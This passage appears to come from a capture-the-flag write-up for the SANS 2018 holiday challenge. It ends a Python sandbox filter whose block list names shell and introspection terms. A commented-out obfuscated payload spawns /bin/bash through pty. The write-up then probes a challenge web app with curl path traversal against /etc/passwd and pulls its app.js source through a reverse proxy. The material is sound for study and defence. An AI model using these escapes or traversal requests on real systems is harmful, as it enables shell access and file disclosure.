    &lt;span class="n"&gt;inline&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;input&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;#warning: if any of your imports enable the blacklisted items you will expose the question to the test taker.&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;eachterm&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;whitelist&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;inline&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot; &amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;eachterm&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot; &amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;inline&lt;/span&gt;
    &lt;span class="c1"&gt;#warning: removing any of the following items from this list will likely expose the question.&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;eachterm&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;restricted_terms&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;eachterm&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot; &amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;inline&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot; &amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Use of the command {0} is prohibited for this question.&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;eachterm&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;inline&lt;/span&gt;

&lt;span class="n"&gt;whitelist&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;__main__&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;restricted_terms&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;import&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;pty&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;open&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;exec&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;compile&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;os.system&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;subprocess.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;reload&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;__builtins__&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;__class__&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;__mro__&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="n"&gt;code&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;interact&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;banner&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;banner&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;readfunc&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;readfilter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;locals&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="c1"&gt;#eval(&amp;quot;__im&amp;quot;+&amp;quot;port__(&amp;#39;p&amp;#39;+&amp;#39;ty&amp;#39;).s&amp;quot;+&amp;quot;pawn(&amp;#39;/bin/bash&amp;#39;)&amp;quot;)&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="packet-capture-and-analysis-website"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id35"&gt;Packet Capture and Analysis Website&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Santa has created a &lt;a class="reference external" href="https://packalyzer.kringlecastle.com/"&gt;packet capture and analysis web site&lt;/a&gt;, where people can upload PCAP files
to analyze them, or sniff traffic from the website for 20 seconds:&lt;/p&gt;
&lt;img alt="packalyzer_sniffing_traffic.png" class="align-center" src="/images/sans-christmas-challenge-2018/packalyzer_sniffing_traffic.png" /&gt;
&lt;img alt="packalyzer_sniffing_done.png" class="align-center" src="/images/sans-christmas-challenge-2018/packalyzer_sniffing_done.png" /&gt;
&lt;p&gt;Sniffing traffic from the website is interesting, because we could then see
other people's traffic. Unfortunately, the only traffic we see is HTTPS, which
means that it is encrypted. If we want to decrypt it, we have to find a way to
get the server's private SSL key.&lt;/p&gt;
&lt;p&gt;Since the website offers an upload functionality, I tried uploading invalid
PCAP files, in order to get code execution via a webshell. However, it did not
work. I also tried some path traversing in the &lt;code&gt;uploads&lt;/code&gt; directory, but
it did not work:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; curl &lt;span class="s1"&gt;&amp;#39;https://packalyzer.kringlecastle.com/uploads/../../../../etc/passwd&amp;#39;&lt;/span&gt; -H &lt;span class="s1"&gt;&amp;#39;Cookie: PASESSION=287850715490745264942409679417652&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;Not Found&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I tried some directory listing, but I also got an error there:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; curl &lt;span class="s1"&gt;&amp;#39;https://packalyzer.kringlecastle.com/uploads/&amp;#39;&lt;/span&gt; -H &lt;span class="s1"&gt;&amp;#39;Cookie: PASESSION=287850715490745264942409679417652&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;Error: EISDIR: illegal operation on a directory, read&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; curl &lt;span class="s1"&gt;&amp;#39;https://packalyzer.kringlecastle.com/uploads/test&amp;#39;&lt;/span&gt; -H &lt;span class="s1"&gt;&amp;#39;Cookie: PASESSION=287850715490745264942409679417652&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;Error: ENOENT: no such file or directory, open &amp;#39;/opt/http2/uploads//test&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ha! We got a different error message. The error codes &lt;code&gt;EISDIR&lt;/code&gt; and
&lt;code&gt;ENOENT&lt;/code&gt; indicates that the website is most likely based on Node.js. We
also learned that our web root is in &lt;code&gt;/opt/http2/&lt;/code&gt;. However, we're not
closer to our goal. So let's keep digging, by looking at the source code of the
website:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://packalyzer.kringlecastle.com:80/pub/js/jquery.ui.widget.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://packalyzer.kringlecastle.com:80/pub/js/jquery.iframe-transport.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://packalyzer.kringlecastle.com:80/pub/js/jquery.fileupload.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://cdnjs.cloudflare.com/ajax/libs/materialize/0.100.2/js/materialize.min.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://packalyzer.kringlecastle.com:80/pub/js/custom.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://packalyzer.kringlecastle.com:80/pub/js/xss.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;https://packalyzer.kringlecastle.com:80/pub/js/loader.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That's kind of odd: the website loads some JavaScript files. What's odd is that
it connects to the packalyzer website using HTTPS, but on the TCP port 80,
which is usually used for plaintext HTTP. Let's investigate a little bit more
on this port. Let's try to see the content of the &lt;code&gt;/pub/&lt;/code&gt; directory:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; curl &lt;span class="s1"&gt;&amp;#39;https://packalyzer.kringlecastle.com:80/pub/&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;403 Forbidden&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;body bgcolor=&amp;quot;white&amp;quot;&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;403 Forbidden&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;&amp;lt;hr&amp;gt;&amp;lt;center&amp;gt;nginx/1.10.3&amp;lt;/center&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Huh, we didn't get the same error message as before. Here, we can see that
we're communicating with an nginx server.&lt;/p&gt;
&lt;p&gt;What is most likely happening here is that there are two webservers:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;One listening on TCP/443, which runs the Node.js application.&lt;/li&gt;
&lt;li&gt;One listening on TCP/80, which is most likely an nginx reverse proxy that
serves static files to the web application.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That's interesting, maybe we can use the nginx reverse proxy to download the
server's SSL key. I tried several ideas, such as doing a path traversal to try
and download the SSL key, but it didn't work. So what other files can we try
to download. One of the most important files in a Node.js application is the
&lt;code&gt;app.js&lt;/code&gt; file, which holds most of the application logic. Let's try to
download it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; curl &lt;span class="s1"&gt;&amp;#39;https://packalyzer.kringlecastle.com:80/app.js&amp;#39;&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt;!/usr/bin/node
&lt;span class="go"&gt;//pcapalyzer - The web based packet analyzer&lt;/span&gt;
&lt;span class="go"&gt;const cluster = require(&amp;#39;cluster&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const os = require(&amp;#39;os&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const path = require(&amp;#39;path&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const fs = require(&amp;#39;fs&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const http2 = require(&amp;#39;http2&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const koa = require(&amp;#39;koa&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const Router = require(&amp;#39;koa-router&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const mime = require(&amp;#39;mime-types&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const mongoose = require(&amp;#39;mongoose&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const koaBody = require(&amp;#39;koa-body&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const cookie = require(&amp;#39;koa-cookie&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const execSync = require(&amp;#39;child_process&amp;#39;).execSync;&lt;/span&gt;
&lt;span class="go"&gt;const execAsync = require(&amp;#39;child_process&amp;#39;).exec;&lt;/span&gt;
&lt;span class="go"&gt;const redis = require(&amp;quot;redis&amp;quot;);&lt;/span&gt;
&lt;span class="go"&gt;const redis_connection = redis.createClient();&lt;/span&gt;
&lt;span class="go"&gt;const {promisify} = require(&amp;#39;util&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;const getAsync = promisify(redis_connection.get).bind(redis_connection);&lt;/span&gt;
&lt;span class="go"&gt;const setAsync = promisify(redis_connection.set).bind(redis_connection);&lt;/span&gt;
&lt;span class="go"&gt;const delAsync = promisify(redis_connection.del).bind(redis_connection);&lt;/span&gt;
&lt;span class="go"&gt;const sha1 = require(&amp;#39;sha1&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It works! Here's the full file. (There was some binary content in the middle
of the file that I removed):&lt;/p&gt;
&lt;table class="highlighttable"&gt;&lt;tr&gt;&lt;td class="linenos"&gt;&lt;div class="linenodiv"&gt;&lt;pre&gt;  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159&lt;/pre&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/node&lt;/span&gt;
&lt;span class="c1"&gt;//pcapalyzer - The web based packet analyzer&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cluster&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;cluster&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;os&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;os&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;path&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;fs&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;http2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;http2&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;koa&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;koa&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;Router&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;koa-router&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;mime&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;mime-types&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;mongoose&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;mongoose&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;koaBody&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;koa-body&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cookie&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;koa-cookie&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;execSync&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;child_process&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;execSync&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;execAsync&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;child_process&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;redis&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;redis&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;redis_connection&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;redis&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createClient&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nx"&gt;promisify&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;util&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;getAsync&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;promisify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;redis_connection&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;bind&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;redis_connection&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;setAsync&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;promisify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;redis_connection&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;set&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;bind&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;redis_connection&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;delAsync&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;promisify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;redis_connection&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;del&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;bind&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;redis_connection&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;sha1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sha1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
